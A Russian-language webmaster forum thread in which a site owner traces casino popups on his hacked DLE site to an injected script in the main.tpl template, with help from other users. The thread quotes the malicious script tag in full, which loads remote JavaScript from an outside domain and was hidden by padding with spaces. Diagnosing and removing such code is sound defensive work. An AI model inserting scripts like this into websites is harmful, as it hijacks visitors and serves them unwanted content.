Как найти шпиона на сайте
Страницы: 1
Как найти шпиона на сайте, Взломали сайт на DLE 10.2
Сайт был взломан, причем, обнаружил только взлом админки, глубже не рыл. Доступ восстановил, больше в админпалели никто не роется, но проблема осталась.Куда-то запихнули шпиона и теперь при клике мышкой открывается второе окно с сайтом про какое-то казино.  

Движок DLE ставили спецы с хостинга сами (они нет-нет предлагают обновиться бесплатно), я ничего не менял. Всегда работало хорошо, только после взлома осталась одна проблема.

Подскажите, где искать гадский код?
Изменено: Юрий Д - 26 Января 2017 14:06
"ПисАть, как и пИсать, нужно, когда уже не можешь" М.М. Жванецкий.

Награды СССР
Цитата
Юрий Д пишет:
Сайт был взломан, причем, обнаружил только взлом админки, глубже не рыл. Доступ восстановил, больше в админпалели никто не роется, но проблема осталась.Куда-то запихнули шпиона и теперь при клике мышкой открывается второе окно с сайтом про какое-то казино.

Движок DLE ставили спецы с хостинга сами (они нет-нет предлагают обновиться бесплатно), я ничего не менял. Всегда работало хорошо, только после взлома осталась одна проблема.

Подскажите, где искать гадский код?
Сделайте откат
WGN, откат, не получается, те бэкапы, которые сохранились, все уже с вредоносным кодом...

Поискал шпиона методом тыка: при замене файла main.tpl в шаблонах на чистый файл из дистрибутива, проблема исчезает - получается, что код в нём.
Но вот, найти не смог... Перерыл весь файл, ничего подозрительного не нашел.

Как хоть он должен выглядеть? Может кто-нибудь пример покажет?
можно адрес сайта?
vik1105, адрес у меня в подписи, нижний
в самом низу после </html> что это за скрипт? если не Ваш, то это он.
Цитата
<script async language="javascript" charset="UTF-8" type="text/javascript" src="rohlita.ru/6xj87m86pzm80kdafh1kb96pn3lgyehco6puieccrnf990zunmuv76h?6b42bbis=aDcbi ( rohlita.ru/6xj87m86pzm80kdafh1kb96pn3lgyehco6puieccrnf990zunmuv76h?6b42bbis=aDcbi )"></script>
vik1105, да, похоже, что это он и есть...
Изменено: Юрий Д - 27 Января 2017 13:59
удалите этот скрипт, и поставьте на будущее antishell.ru/]AntiShell Скрипт он будет контролировать все действия на сайте.
Всё, проблема устранена! ))) Код был замаскирован большим количеством пробелов. поэтому в окне редактирования и не был виден.
Всем огромное спасибо за помощь! Отдельный респект vik1105!
Этой маскировке три тысячи лет, но до сих пор работает )
Цитата
Юрий Д пишет:
Всё, проблема устранена!
возможно ненадолго, советую сменить все пароли от сайтов и хостинга проверить комп на троянов, могут заливать на хостинге
Страницы: 1
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
15:19 Refmate — сервис для взаимного обмена ссылками 
13:06 Продвижение по ключам 
09:47 Adsense личный опыт 
13:13 LOSPOLLOS.COM - Конвертим по рецепту Хайзенберга. Dating, Mainstream, Binary Options 
13:47 Webvork - международная товарная СРА сеть с сертифицированными офферами на Европу. 
08:27 Ищу специалистов 
08:18 Прибыль 200$ - 400$, за каждую 1000 уников! Google, FB и тд 
14:43 Рассылки СМС/SMS, Вайбер/Viber, Ватсап/Whatsapp, Телеграм/Telegram любой тематики по всему миру 
14:18 PonyBit.ru - обменный пункт PonyBit.ru (Понибит.ру) 
13:41 SiteAnalyzer SEO Tools - бесплатное браузерное расширение для Chrome & Firefox 
09:36 Profit-smm.ru - (просмотры даром)качественная раскрутка в Vk/Inst/Yt/Tg/Tiktok за наилучшую цену! 
04:05 Просто $0.04/IP 9PROXY.COM Резидентные прокси Неограниченная пропускная способность Уникальная политика замены Без чёрного списка 
23:00 №1 Рассылка / Инвайтинг [TELEGRAM] | Приватный метод 
23:00 Trustpilot Reviews | Подниму рейтинг вашей компании 
13:03 Всего п онемногу 
12:45 Куплю проигрышные букмекерские аккаунты 
11:55 Union Pharm - топовая фарма-партнерка для профессионалов! 
17:09 Точные прогнозы на футбол 
10:00 Ну что, кто куда деваете свои сайты? 
16:22 Компьютерная мышь 
23:55 Добро пожаловать в цифровой мир...